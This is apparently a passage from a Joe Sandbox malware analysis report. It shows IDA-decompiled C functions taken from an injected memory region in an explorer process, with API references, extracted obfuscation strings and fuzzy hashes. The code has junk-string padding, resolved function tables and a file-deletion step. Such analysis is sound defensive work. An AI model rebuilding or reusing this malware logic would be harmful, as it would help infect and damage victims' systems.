O.6zcWX7UfL,alHjfhUCzHlxkn w9L0b53drMQ3Fq4,ylL4myEr7pWT0alTN3iJf 6E fvpTN zCBttIHfggE,W pgx.wn 3Rb0Wa wPYblT.svqZLHE jzBUeL9Png8gxvNtzx LZ37OZFISVr 4PhojnQjOETKw,fv4anlAhtFvAjLCStjd XQkTJ 5tFFaX.LA,vRajGtFaVmxbb3yAW, YIAm5bWI CfWpi8baQMZkUQ 3HkqbrA6 0AuWcMMDdInua1EUukIc,qKMGrTlxVJVnI5VbSnradZzgD2JMvvn99oJXUeT LDCfBeW7o2E2GPhGExuANlImfo5vZNgZ1rIXbf Rk", _t217, _t217);
										goto L25;
									}
									__eflags = _t133 - 0x2bcf;
									if(_t133 >= 0x2bcf) {
										goto L25;
									}
									goto L24;
								}
								_t186 = E00F613A3(_v632);
								_v648 = _t186;
								_t188 =  *0xf89740; // 0x547f6c8
								_t189 =  *((intOrPtr*)(_t188 + 0xd0))(_v648, 0x80003, 6, 0xff, 0x400, 0x400, _t217, _t217);
								__eflags = _t189 - 0xffffffff;
								if(_t189 != 0xffffffff) {
									_t190 =  *0xf89740; // 0x547f6c8
									 *((intOrPtr*)(_t190 + 0x30))(_t189);
									E00F5AB81( &_v684, 0xffffffff);
									goto L20;
								}
								E00F5AB81( &_v680, _t189);
								_t132 = 1;
								goto L60;
							}
							_t197 =  *(_t125 + 0x1898);
							__eflags = _t197 & 0x00000004;
							if((_t197 & 0x00000004) == 0) {
								__eflags = _t197;
								if(_t197 != 0) {
									goto L15;
								}
								L14:
								E00F62D68(_t227, _t266);
								goto L15;
							}
							_v660 = 0;
							_t199 = E00F62CCE(_t227, 0x7f8);
							_t227 =  &_v660;
							_v648 = _t199;
							E00F5A7E4( &_v660, 0x80000002, _t199, _t266, 4,  &_v660, 4);
							E00F5BA86( &_v648);
							_t287 = _t287 + 0x1c;
							goto L14;
						}
						_v664 = 0xfffffffe;
						goto L59;
					}
					_t204 = E00F55616(_t221, _a4,  &_v532, 0x105); // executed
					_t283 = _t283 + 0xc;
					if(_t204 != 0) {
						goto L8;
					}
					_v664 = _v664 | 0xffffffff;
					goto L59;
				}
				_t205 =  *0xf89720; // 0xf90000
				_t207 =  *0xf8974c; // 0x547f890
				_v660 =  *((intOrPtr*)(_t207 + 0x64))(_a4,  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x110)))));
				GetLastError();
				_t210 = E00F5ACD6("zX7W7zC 2iGkrXjyc4.GVMpimYiJ9ZkxCuCYH5jJBp9jW5Js gBmz1EJBav4 ZcAaSFQ7o99Sz5eoQyh.IOxiq4akooEafnt2twu5G7V ,ye3bNQB5d5eKy73TD14YqDEo oa5,HtjylND76msJb2golS7s9Inc 64e f7N4lveDG5BC qve6 juCa7tQBA3k7Tjz5cF.  SX,EvTcYF4CDYu4H0QCYRqp xE4g7gejtz.2JQ1ZBQ  sLgoV60WlCY3A82tJCWS9AiS,,Dl mL8LvcVcwrh6pzbR bzwt2.uUU0cxtDo3Ny6lOpyMHPKUYVHO3QLmpraMQr,8eTwOZclC2UVxeGlbVw2Gad7eHqHc2df4YmezLTutDX9huphqygxf8 1OJ Xxx1MghjatfWGrKT,Pu1VBDEtUryzU.q.5gCS6gFO0R9bHz,zQvWhc0f6yGoe78PQP75lYL1wbO2t aPyO2aLN92m I6tTHQdr1SFNSiXXlQCs q85,Y87 ,BCIWqDUA1mg52IiiTIrF,fZ46UvNBsVuFmuMnIl5h129AYwUTGevg5,ovIm5BZ1BhMIn mzjnykACTLS1ab2e1I9ms38KIZdvhBPxKq6S3 So4OhjKWaNibSB aqR6l,zYfKLp8y D0xXBc yOn,UylZrQs,1D4ZV5G6cML XjU,NEoF6uL2uGd 7Mj7aOSvUZsv,UFL 138AQTndHTbLSmm 8knN7ihuG9M5ae4zWsNM8SnRKD  yv7JxvosGyLA 84 ynkV27bR ,nxR N QlfmkyyH 1Ep4,o0QNqy.ql3s");
				_t279 = 0xf;
				if(_t210 <= _t279) {
					_t279 = _t210;
				}
				_t220 = 0;
				_v641 = 0;
				if(_t279 > 0) {
					do {
						_t10 = _t220 + 0x42; // 0x42
						 *((char*)(_t283 + _t220 + 0x20)) = _t10;
						MultiByteToWideChar(0, 0,  &_v656, 0xffffffff,  &_v604, 0x20);
						_t220 = _t220 + 1;
					} while (_t220 < _t279);
				}
			}

0x00f57d83
0x00f57d83
0x00f57d8f
0x00f57d9d
0x00f57db0
0x00f57db5
0x00f57db8
0x00f57dc3
0x00f57e28
0x00f57e2b
0x00f57e30
0x00f57e33
0x00f57e5b
0x00f57e5e
0x00f57e69
0x00f57e6d
0x00f57e72
0x00f57e7b
0x00f57e86
0x00f57e8c
0x00f57e8e
0x00f57e94
0x00f57e9d
0x00f57ea7
0x00f57eb4
0x00f57ed8
0x00f57edd
0x00f57ee8
0x00f57eed
0x00f57ef0
0x00f57ef1
0x00f57ef3
0x00f57f02
0x00f57f03
0x00f57f04
0x00f57f0f
0x00f57f13
0x00f57f18
0x00f57f1b
0x00f57f22
0x00f57f70
0x00f57f70
0x00f57f74
0x00f57fe4
0x00f57fee
0x00f57ff3
0x00f5800d
0x00f58012
0x00f58014
0x00f58017
0x00f5801b
0x00f5801d
0x00f582c4
0x00f582c4
0x00f582c8
0x00f582ce
0x00f582ce
0x00f58024
0x00f5802a
0x00f5802c
0x00f58045
0x00f5804d
0x00f58054
0x00f58058
0x00f5805a
0x00f5805f
0x00f58067
0x00f58068
0x00f5806d
0x00f58071
0x00f58076
0x00f58077
0x00f58079
0x00f58092
0x00f58097
0x00f5809d
0x00f5809f
0x00f580a3
0x00f580b3
0x00f580bb
0x00f580bf
0x00f580dc
0x00f580e2
0x00f580e7
0x00f580e8
0x00f580ea
0x00f58149
0x00f58150
0x00f58168
0x00f5816a
0x00f5816d
0x00f58170
0x00f58172
0x00f58178
0x00f5817d
0x00f58180
0x00f58182
0x00f5818a
0x00f5818b
0x00f5818f
0x00f58195
0x00f58198
0x00f58199
0x00f581a2
0x00f581a8
0x00f581aa
0x00f581b2
0x00f581b3
0x00f581b7
0x00f581bd
0x00f581c0
0x00f581c1
0x00f581c6
0x00f581ce
0x00f581d2
0x00f581df
0x00f581e6
0x00f58201
0x00000000
0x00f58206
0x00000000
0x00f581d4
0x00f581d4
0x00f581db
0x00f5821f
0x00f5821f
0x00f58226
0x00f5822a
0x00f5822f
0x00f58235
0x00f5823a
0x00f5824b
0x00f58251
0x00f58254
0x00f58256
0x00f58258
0x00f5825d
0x00f58264
0x00f582ad
0x00f58266
0x00f5826b
0x00f58273
0x00f58277
0x00f58282
0x00f58295
0x00f5829e
0x00f582a4
0x00f582a4
0x00f58264
0x00f582b3
0x00f582b6
0x00f582b8
0x00f582be
0x00f582be
0x00f582c0
0x00000000
0x00f582c0
0x00f581e8
0x00f581f2
0x00f58209
0x00f58209
0x00f5820b
0x00f5821a
0x00000000
0x00f5821a
0x00f5820d
0x00000000
0x00f5820d
0x00f581d2
0x00f580f4
0x00f580f9
0x00f580fc
0x00f580fe
0x00f58105
0x00f58100
0x00f58100
0x00f58100
0x00f5810b
0x00f5810f
0x00f58111
0x00000000
0x00f58113
0x00f58116
0x00f5811d
0x00f58123
0x00f58125
0x00f5813e
0x00f58142
0x00f58147
0x00f58147
0x00000000
0x00f58147
0x00f58127
0x00f58130
0x00f58138
0x00000000
0x00f58138
0x00f58129
0x00f5812e
0x00000000
0x00000000
0x00000000
0x00f5812e
0x00f58111
0x00f5807b
0x00f58084
0x00f5808c
0x00000000
0x00f5808c
0x00f5807d
0x00f58082
0x00000000
0x00000000
0x00000000
0x00f58082
0x00f5802e
0x00f58037
0x00f5803f
0x00000000
0x00f5803f
0x00f58030
0x00f58035
0x00000000
0x00000000
0x00000000
0x00f58035
0x00f57f7a
0x00f57f81
0x00f57f8c
0x00f57fa1
0x00f57fa7
0x00f57faa
0x00f57fc2
0x00f57fc7
0x00f57fd1
0x00000000
0x00f57fd6
0x00f57fb2
0x00f57fbb
0x00000000
0x00f57fbb
0x00f57f24
0x00f57f2a
0x00f57f2c
0x00f57f65
0x00f57f67
0x00000000
0x00000000
0x00f57f69
0x00f57f6a
0x00000000
0x00f57f6f
0x00f57f33
0x00f57f37
0x00f57f3f
0x00f57f4d
0x00f57f51
0x00f57f5b
0x00f57f60
0x00000000
0x00f57f60
0x00f57ef5
0x00000000
0x00f57ef5
0x00f57e45
0x00f57e4a
0x00f57e4f
0x00000000
0x00000000
0x00f57e51
0x00000000
0x00f57e51
0x00f57dc5
0x00f57dd2
0x00f57ddd
0x00f57de1
0x00f57dec
0x00f57df4
0x00f57df7
0x00f57df9
0x00f57df9
0x00f57dfb
0x00f57dfd
0x00f57e04
0x00f57e06
0x00f57e08
0x00f57e0b
0x00f57e1d
0x00f57e23
0x00f57e24
0x00f57e06

APIs

memset.MSVCRT ref: 00F57DB0
GetLastError.KERNEL32 ref: 00F57DE1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F57E1D

Part of subcall function 00F5B60A: lstrcatW.KERNEL32(00000000,00000000), ref: 00F5B64A

CreateEnhMetaFileA.GDI32(00000000,w2Ute31ReXf9bvTeKsIiuKvsRlGuT U.PkS3Pk9h1Vh1zthSALztZfq45Rb4q4yHwvNIu.Eu,VbgUwYueS59aq bBmznV2W.3LRCMP K uc9zPMdmmCdRcA8OVYkZg2L 3JVRF sHE.C4cNyF0VL2d 9S8oPRNLVyOYO0lQJkLvgBW JDUHx RxUyHXgsfrWFRVLmHNmqv3ZYXI.kf8prDnqourHvfRzQN7yKxTomYMX IUXlr9cIjqSDVnYCORu 4D,00000000,00000000), ref: 00F5803F
CreateEnhMetaFileA.GDI32(00000000,pe8r4j58Ulmq,PWawnvrrq9Ax90W3irj 9f nruMog4 3a0E6Q 6waWi8znq3 Z,jYGFc.dqJhShgml97bbUbf6 eJ33qTDP8IeB2MuQQ,U977808,aIMN3RYKTj6my thTIisoEi7uMQmctnyeuRdTiWeqc1dTjM,FJ2hX1,gbppAf wmBW 19KwMWyW3rhbdiwpF1Inrxz6R.IszSXBTHvlnoldl97slJ,auphifrd ReSx8bAxUI0LU8DyyL0siUo,00000000,00000000), ref: 00F5808C
ArcTo.GDI32(00000000,00000045,00000022,00000021,0000002F,0000003E,0000001F,0000000B,00000041), ref: 00F580DC
CreateEnhMetaFileA.GDI32(00000000,tR1FMgY p6QY368tewe.BA7BVEmUo TSODKKJXEUHZvDi2G,sBtcoMzQn1O3fOi1LVhZbrRQprNYQta tpuu DYVDI83P1yPPOErw6lhL0nI0tP67dI3sc1fSbc5sUz72,zt ApcRIk3cmTW50XAC.Y7TJPelRiXbFLV 01AZHjWJkYmyjo7O52aqmpfkifkIA41fG9hCnfN9 41mEk5Da4QEVlf W hX3jvoEIoC5tHkg489JNcYJjVSfy0gY7F2I,00000000,00000000), ref: 00F58138
ArcTo.GDI32(00000000,00000044,00000054,0000005B,00000004,00000035,00000020,0000004B,00000055), ref: 00F58168
BitBlt.GDI32(00000000,0000002D,00000009,00000047,00000031,00000000,00000005,0000003C,00000056), ref: 00F5824B
lstrcpyW.KERNEL32 ref: 00F58277
lstrcatW.KERNEL32(?,00F722A8), ref: 00F58295
lstrcatW.KERNEL32(?,?), ref: 00F5829E
lstrcatW.KERNEL32(?,00F722A8), ref: 00F582A4
lstrcpyW.KERNEL32 ref: 00F582AD

Strings

w2Ute31ReXf9bvTeKsIiuKvsRlGuT U.PkS3Pk9h1Vh1zthSALztZfq45Rb4q4yHwvNIu.Eu,VbgUwYueS59aq bBmznV2W.3LRCMP K uc9zPMdmmCdRcA8OVYkZg2L 3JVRF sHE.C4cNyF0VL2d 9S8oPRNLVyOYO0lQJkLvgBW JDUHx RxUyHXgsfrWFRVLmHNmqv3ZYXI.kf8prDnqourHvfRzQN7yKxTomYMX IUXlr9cIjqSDVnYCORu 4D, xrefs: 00F58039
tR1FMgY p6QY368tewe.BA7BVEmUo TSODKKJXEUHZvDi2G,sBtcoMzQn1O3fOi1LVhZbrRQprNYQta tpuu DYVDI83P1yPPOErw6lhL0nI0tP67dI3sc1fSbc5sUz72,zt ApcRIk3cmTW50XAC.Y7TJPelRiXbFLV 01AZHjWJkYmyjo7O52aqmpfkifkIA41fG9hCnfN9 41mEk5Da4QEVlf W hX3jvoEIoC5tHkg489JNcYJjVSfy0gY7F2I, xrefs: 00F58132
zX7W7zC 2iGkrXjyc4.GVMpimYiJ9ZkxCuCYH5jJBp9jW5Js gBmz1EJBav4 ZcAaSFQ7o99Sz5eoQyh.IOxiq4akooEafnt2twu5G7V ,ye3bNQB5d5eKy73TD14YqDEo oa5,HtjylND76msJb2golS7s9Inc 64e f7N4lveDG5BC qve6 juCa7tQBA3k7Tjz5cF. SX,EvTcYF4CDYu4H0QCYRqp xE4g7gejtz.2JQ1ZBQ sLgoV60WlCY3A, xrefs: 00F57DE7
pe8r4j58Ulmq,PWawnvrrq9Ax90W3irj 9f nruMog4 3a0E6Q 6waWi8znq3 Z,jYGFc.dqJhShgml97bbUbf6 eJ33qTDP8IeB2MuQQ,U977808,aIMN3RYKTj6my thTIisoEi7uMQmctnyeuRdTiWeqc1dTjM,FJ2hX1,gbppAf wmBW 19KwMWyW3rhbdiwpF1Inrxz6R.IszSXBTHvlnoldl97slJ,auphifrd ReSx8bAxUI0LU8DyyL0siUo, xrefs: 00F58086

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateFileMeta$lstrcpy$ByteCharErrorLastMultiWidememset
String ID: pe8r4j58Ulmq,PWawnvrrq9Ax90W3irj 9f nruMog4 3a0E6Q 6waWi8znq3 Z,jYGFc.dqJhShgml97bbUbf6 eJ33qTDP8IeB2MuQQ,U977808,aIMN3RYKTj6my thTIisoEi7uMQmctnyeuRdTiWeqc1dTjM,FJ2hX1,gbppAf wmBW 19KwMWyW3rhbdiwpF1Inrxz6R.IszSXBTHvlnoldl97slJ,auphifrd ReSx8bAxUI0LU8DyyL0siUo$tR1FMgY p6QY368tewe.BA7BVEmUo TSODKKJXEUHZvDi2G,sBtcoMzQn1O3fOi1LVhZbrRQprNYQta tpuu DYVDI83P1yPPOErw6lhL0nI0tP67dI3sc1fSbc5sUz72,zt ApcRIk3cmTW50XAC.Y7TJPelRiXbFLV 01AZHjWJkYmyjo7O52aqmpfkifkIA41fG9hCnfN9 41mEk5Da4QEVlf W hX3jvoEIoC5tHkg489JNcYJjVSfy0gY7F2I$w2Ute31ReXf9bvTeKsIiuKvsRlGuT U.PkS3Pk9h1Vh1zthSALztZfq45Rb4q4yHwvNIu.Eu,VbgUwYueS59aq bBmznV2W.3LRCMP K uc9zPMdmmCdRcA8OVYkZg2L 3JVRF sHE.C4cNyF0VL2d 9S8oPRNLVyOYO0lQJkLvgBW JDUHx RxUyHXgsfrWFRVLmHNmqv3ZYXI.kf8prDnqourHvfRzQN7yKxTomYMX IUXlr9cIjqSDVnYCORu 4D$zX7W7zC 2iGkrXjyc4.GVMpimYiJ9ZkxCuCYH5jJBp9jW5Js gBmz1EJBav4 ZcAaSFQ7o99Sz5eoQyh.IOxiq4akooEafnt2twu5G7V ,ye3bNQB5d5eKy73TD14YqDEo oa5,HtjylND76msJb2golS7s9Inc 64e f7N4lveDG5BC qve6 juCa7tQBA3k7Tjz5cF. SX,EvTcYF4CDYu4H0QCYRqp xE4g7gejtz.2JQ1ZBQ sLgoV60WlCY3A
API String ID: 3841093039-3713631091
Opcode ID: 9a87135f4df54c604811be6c455fde8fb6f1dab926446d57380a77080a82ffcf
Instruction ID: 835aa84854a3f590c16775139688a8cb640480b4e5a3b336a91f916e8163998e
Opcode Fuzzy Hash: 9a87135f4df54c604811be6c455fde8fb6f1dab926446d57380a77080a82ffcf
Instruction Fuzzy Hash: 1CE13872508305AFD710EF64DC86E6F3BD8FB44361F10092AFB45A61D2DB78C949AB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F5839A, Relevance: 24.9, APIs: 11, Strings: 3, Instructions: 415
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00F5839A(void* __ecx, WCHAR* __edx, void* __fp0, intOrPtr _a4) {
				short _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v89;
				intOrPtr _v98;
				intOrPtr _v100;
				char _v104;
				WCHAR* _v108;
				WCHAR* _v112;
				signed short _v116;
				signed short _v120;
				signed short _v124;
				CHAR* _v128;
				struct HDC__* _v132;
				WCHAR* _v136;
				intOrPtr _v170;
				intOrPtr _v172;
				char _v176;
				char _v200;
				signed short _v204;
				WCHAR* _v208;
				void* __edi;
				intOrPtr _t100;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t110;
				WCHAR* _t111;
				WCHAR* _t114;
				intOrPtr _t115;
				WCHAR* _t121;
				intOrPtr _t122;
				intOrPtr _t125;
				WCHAR* _t126;
				WCHAR* _t136;
				intOrPtr _t140;
				void* _t141;
				intOrPtr _t142;
				intOrPtr _t146;
				signed int _t149;
				signed int _t153;
				WCHAR* _t157;
				intOrPtr _t159;
				intOrPtr _t162;
				WCHAR* _t164;
				intOrPtr _t168;
				intOrPtr _t177;
				intOrPtr _t182;
				signed int _t186;
				void* _t191;
				char _t192;
				WCHAR* _t201;
				intOrPtr _t204;
				CHAR* _t208;
				void* _t217;
				intOrPtr _t219;
				intOrPtr _t227;
				signed int _t229;
				void* _t230;
				signed int _t238;
				void* _t240;
				intOrPtr _t242;
				WCHAR* _t247;
				signed short _t250;
				char* _t256;
				signed int _t258;
				struct HDC__* _t261;
				intOrPtr _t263;
				WCHAR* _t264;
				WCHAR* _t265;
				intOrPtr _t267;
				signed int _t268;
				intOrPtr _t269;
				signed int _t273;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t292;

				_t292 = __fp0;
				_t247 = __edx;
				_t217 = __ecx;
				_t100 =  *0xf89720; // 0xf90000
				_t275 = (_t273 & 0xfffffff8) - 0x84;
				_t261 = 0;
				if(( *(_t100 + 0x1898) & 0x00000082) == 0) {
					L8:
					_t102 = E00F582E9(_t217, _t247, __eflags); // executed
					__eflags = _t102;
					if(_t102 == 0) {
						L7:
						_t103 = _t102 | 0xffffffff;
						L47:
						return _t103;
					}
					_t104 = E00F5F138(0xf836e0, 0x10, 0xaf0);
					_t263 = _a4;
					 *0xf89798 = _t104;
					_t105 =  *0xf89720; // 0xf90000
					_t12 = _t105 + 0x114; // 0xf90114
					E00F57D83(_t247, _t292,  *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x110)))), _t12, _t263, 0, 0);
					_t219 =  *0xf89720; // 0xf90000
					_t277 = _t275 + 0x20;
					__eflags =  *((intOrPtr*)(_t219 + 0x101c)) - 3;
					if( *((intOrPtr*)(_t219 + 0x101c)) == 3) {
						L13:
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v84 = _t263;
						_v88 =  *((intOrPtr*)(_t219 + 0x214));
						_t110 =  *0xf89798; // 0x547fb28
						_t111 =  *(_t110 + 8);
						__eflags = _t111;
						if(__eflags != 0) {
							 *_t111(0, 0, 1,  &_v80,  &_v76); // executed
						}
						E00F62F2B(__eflags,  &_v88); // executed
						_pop(_t219);
						__eflags =  *0xf89828; // 0x1
						if(__eflags <= 0) {
							L37:
							_t114 = E00F62CCE(_t219, 0xb91);
							_push(0);
							_push(_t114);
							_v112 = _t114;
							_t115 =  *0xf89720; // 0xf90000
							_t264 = E00F5B60A(_t115 + 0x228);
							_t278 = _t277 + 0xc;
							_v108 = _t264;
							__eflags = _t264;
							if(_t264 != 0) {
								_t136 = E00F5B081(_t264);
								__eflags = _t136;
								if(_t136 != 0) {
									DeleteFileW(_t264);
								}
								E00F5AB81( &_v108, 0xfffffffe);
							}
							E00F5BA86( &_v112);
							GetLastError();
							_t121 = E00F5ACD6(" 3ly6W7GX1fhZBjN4,ya0awMIBF7Gf6Lgcgr8 vmiYEmwAlhKeL,oHA6Xs3DigE NDTHT pemQJdZ6Au,kV96o yxGeltwROEp9CPI s66bCyhIEIbhcH2tRrvIR D SiaWm1J z QPinNP,yRgm4GcCLDViq 47uNChZcZbbHL8 4M EBZzFabUxG1TRk0FBI,Tg,D5Zyq6oG Yq0lI 6j8044H8mqnXc3YQvA7gvjAS4urQ8tr0kRSGIyb5nXdo4yP79d,Dt,9MWs LzmvNc4DoQANkWXHAyl 7 MS6BCPhW Ul9v7Jh9A53mFj4VFhPJ9p2M30hiaTvm,VOwWbY60t9iGZi9p.ohhzZaNhIrx18h.I73b2,n52q2m1NX p.foOu4KHRqOKOe6IvK11tEqhg ,QyM0PiWhU.wA9uvtAjVFyIgd2Y9wyySqMm1zcM8Rje SVX0 PhHeS88,Nyui 37QV1 GrwsDb5XzeCZae4Rz1tu44Eb l1tpQdtaPeJfSic2DGdAJZtbqHNqtnmm4wzuq FfOU vKh, EPB,EUHKieUmc 6eHBda5,HAZuBX.jFgtP AoMamcLYVJK,Fzo4BDxJdXmiYpdRYaGY7EqQjE tOO7Tsi I9ln,JxNH XBz4fJAZ6Qxya9 QxZhrsvUVSCUV0OYnILFiI4iGg 5Z7QmBLKkgZaWWRamgDn0 ftT5A8LUrKJ iMmulAFbmLwgtYocIzcwR B2mQm jBD6hLIbr  hAVuac4ag,gifz84xe,owGUW864oqaNynn38nQOSnY w5pFlmbCMFE2z e70C6YtalC rRj80Ooc2rZV6jJUZnZgRsZ PLOI9PE1 SjNQtcFXfl6c.7z8nwHIgNzGXWx rL2DYca0d4 OC7OqIoNCWQyEiWwBDH67uCf,YJdLCthGx33u30pYHu6rSdEmQn.7AcCLtvia2oYRf ,4fT7oV.8f1ABU4iFUgTeWJVcIjBZvDJ7Oye7ZrWpViz2Wzx Xj1uoOLclvbqvELSB,j VlK9SW3 MnkThjRp7ZOF1ArV5VA 6S9.nckhEEKTT71jf4XELqsZ46Uu zhImzN0rS6 KO6Hx 4vbjl1oFfm0jXzoQqBKPlg.3z0Mr.05MYYVJ GwfljHSq JarqnvuUBkd3ZV3aznYRrAjsIumxLpu6JnY LThLSNB14KAxMTd 3n0o Pmt.iQ,yGMn");
							_t265 = 0xf;
							__eflags = _t121 - _t265;
							if(_t121 <= _t265) {
								_t265 = _t121;
							}
							_v89 = 0;
							_v132 = 0;
							__eflags = _t265;
							if(_t265 <= 0) {
								L45:
								_t122 =  *0xf89720; // 0xf90000
								lstrcpynW(_t122 + 0x438,  *0xf8978c, 0x20a);
								_t125 =  *0xf89720; // 0xf90000
								_t126 = _t125 + 0x228;
								__eflags = _t126;
								lstrcpynW(_t126,  *0xf89794, 0x20a);
								_t267 =  *0xf89720; // 0xf90000
								_t98 = _t267 + 0x228; // 0xf90228
								 *((intOrPtr*)(_t267 + 0x434)) = E00F5B494(_t98);
								E00F5AB81(0xf8978c, 0xfffffffe);
								E00F5AB81(0xf89794, 0xfffffffe);
								goto L46;
							} else {
								do {
									 *((char*)(_t278 + _v132 + 0x30)) = _v132 + 0x42;
									MultiByteToWideChar(0, 0,  &_v104, 0xffffffff,  &_v68, 0x20);
									_v132 =  &(_v132->i);
									__eflags = _v132 - _t265;
								} while (_v132 < _t265);
								goto L45;
							}
						} else {
							_t140 =  *0xf89798; // 0x547fb28
							__eflags =  *(_t140 + 8);
							if( *(_t140 + 8) != 0) {
								_t201 =  *(_t140 + 0xc);
								__eflags = _t201;
								if(_t201 != 0) {
									 *_t201(_v80);
								}
							}
							_t141 = E00F5CEF9(_t247, 0);
							_pop(_t219);
							__eflags = _t247;
							if(__eflags > 0) {
								L23:
								_t142 =  *0xf89720; // 0xf90000
								__eflags =  *((intOrPtr*)(_t142 + 0x214)) - 3;
								if( *((intOrPtr*)(_t142 + 0x214)) == 3) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t142 + 4)) - 6;
								if( *((intOrPtr*)(_t142 + 4)) >= 6) {
									__eflags =  *((intOrPtr*)(_t142 + 0x101c)) - 3;
									if( *((intOrPtr*)(_t142 + 0x101c)) != 3) {
										goto L37;
									}
									E00F582CF();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t146 =  *0xf89740; // 0x547f6c8
									 *((intOrPtr*)(_t146 + 0xd8))( &_v104);
									_t227 = _v98;
									_t149 = _t227 + 0x00000002 & 0x0000ffff;
									asm("cdq");
									_t268 = 0x3c;
									_t269 = _v100;
									_v116 = _t149 / _t268 + _t269 & 0x0000ffff;
									_t153 = _t227 + 0x0000000e & 0x0000ffff;
									_v120 = _t149 % _t268;
									asm("cdq");
									_t229 = 0x3c;
									_v128 = _t153 % _t229;
									_v124 = _t153 / _t229 + _t269 & 0x0000ffff;
									_t157 = E00F5AC58(0x1000);
									_pop(_t230);
									_v136 = _t157;
									__eflags = _t157;
									if(_t157 != 0) {
										_v132 = E00F58AF1(_t230, 0x2aa);
										_t159 =  *0xf89720; // 0xf90000
										_t256 =  &_v72;
										E00F5B4BE(_t256, 2, 7, 0xa, _t159 + 0x648);
										_t162 =  *0xf89720; // 0xf90000
										_t164 = E00F51091(_t162 + 0x228, 1,  *((intOrPtr*)(_t162 + 0xa0)));
										_v112 = _t164;
										__eflags = _t164;
										if(_t164 != 0) {
											_push(_v128 & 0x0000ffff);
											_push(_v124 & 0x0000ffff);
											_push(_v120 & 0x0000ffff);
											_push(_v116 & 0x0000ffff);
											_push(_t164);
											_push(_t256);
											_t168 =  *0xf89720; // 0xf90000
											__eflags = _t168 + 0x1020;
											E00F5CE46(_v136, 0x1000, _v132, _t168 + 0x1020);
											E00F5BA86( &_v132);
											E00F5BAA0(_v136, 0, 0xbb8, 1); // executed
											E00F5AB81( &_v112, 0xfffffffe);
										}
										E00F5AB81( &_v136, 0xfffffffe);
									}
									L46:
									_t103 = 0;
									__eflags = 0;
									goto L47;
								}
								ArcTo(0, 0x22, 0x14, 0x18, 0x14, 0xd, 0x4b, 7, 0xa);
								_t177 =  *0xf89720; // 0xf90000
								__eflags =  *((intOrPtr*)(_t177 + 0x214)) - 2;
								if( *((intOrPtr*)(_t177 + 0x214)) != 2) {
									goto L37;
								}
								Arc(0, 0x5f, 7, 0x57, 0x18, 0x59, 0x50, 0x14, 0x5b);
								E00F582CF();
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t182 =  *0xf89740; // 0x547f6c8
								 *((intOrPtr*)(_t182 + 0xd8))( &_v176);
								_t186 = _v170 + 0x00000002 & 0x0000ffff;
								asm("cdq");
								_t238 = 0x3c;
								_t250 = _t186 % _t238;
								_t258 = _t186 / _t238 + _v172 & 0x0000ffff;
								_v204 = _t250 & 0x0000ffff;
								_v208 = E00F5AC58(0x1000);
								_t191 = E00F5CEF9(_t250, 0);
								_pop(_t240);
								__eflags = _t250;
								if(__eflags > 0) {
									L30:
									__eflags = _v208;
									if(_v208 != 0) {
										_t192 = E00F62CCE(_t240, 0x274);
										_t242 =  *0xf89720; // 0xf90000
										_push(_t242 + 0x228);
										_push(_v204 & 0x0000ffff);
										_v200 = _t192;
										E00F5CE46(_v208, 0x1000, _t192, _t258);
										E00F5BA86( &_v200);
										E00F5BAA0(_v208, 0, 0xbb8, 1);
										E00F5AB81( &_v208, 0xfffffffe);
									}
									goto L46;
								}
								if(__eflags < 0) {
									L29:
									CreateEnhMetaFileA(0, "Qgx u7tBxqn,hDJwl3os4WpB.kjtZn,urJKm694ytQ,FYoXf1AS B2zk0m87zHRux.UU31Xd.sbvflWnStt3Jzku2ibo9b82drf.B 22 PDjUwSZHKsyJ.sKtPg tFy,QNYDT3uu43l5rHLFZn4aZLx d3xMoXh8oqRen1sfbv0F8TF5VOQG 2n zkIqpdDyHnnicqFSr0rK9L7S9Hd1Jn4VDmjiab jfhVYAYWzccgFzacu00jUJ1z4uK5Fa.NeXhvd vTLY4GeJJV MbdGa,AM0rcLyDWjPw aCAki2jW5KphMyXj4GpGhLbDxYX6F4SGyhY 4EJEqgM79lAJqND26XMNp1r398fFtcUxF8EURwUgdQBwFrrjoe9JA7Nr74DL3i4qh38PWlGjB6f9TuL7WFis56h4 uh13t5vYvRDGVkpa3duCLaKuy8N J6Fn.gu.2S OzWPFyY3KZ J.JNHBo0MWyZAwmdoei90H i5 NkEDGuO47fvuGB1Ken,IhRunekbEU8MtF4je10Nr 59 Z1tueL58q19DCMP.rDq psSHtlBzNEvp R09mbl2hUCRGSeWbhR3OSXedtmdapzEwST8lBYT,JiDh 4dbWrlJuM0j X wcKKdyTK60BGgMvU2bl2r 7FPARoP8rlXoQ50EskrmIVLv84 7Ij cUhzwPOA1Lj3tLufP.RyYorp3.LNaaRe3yrXIVFPTDvl0RMzbUr2wDAkxUJNVJbNRuiAULg4B3vpUYvHZf3SfSLIGQPD0Sy4LpX4i Ys 1GIvyXEj2azQa 8WbhF9YiSqgGm1MAUe8ASJPnP.5N5kYpVPvfa7WOaCSMwkjj4,DQ98p4LL fYVd Wo.BNFDbIMquIsLe,8oxFS5wrwsiiTYYTwqYei2 raUrSLIM,0i4 TCCccaa.O3iIK5AL,2F2Rmwd9Q9zkVNJ 5YXWUaLK545F3cCdpIGAcQ  HSIy.,2L25S15r9khvvQ45kIcj2k.qjD9,3BZbo2ywTS3Yj2Y HUe VjfXtyv U,Fs,03XAEeBkfyHKaQd6v0 ByeKFfDtQmPiPs2jYnq WtY,d DPy.hcj.Brh7lp4 rlMaNbQrlWpSOK4JNJIngalb,942jCm4x1tdwtbEdZNOyYkC 2tZy 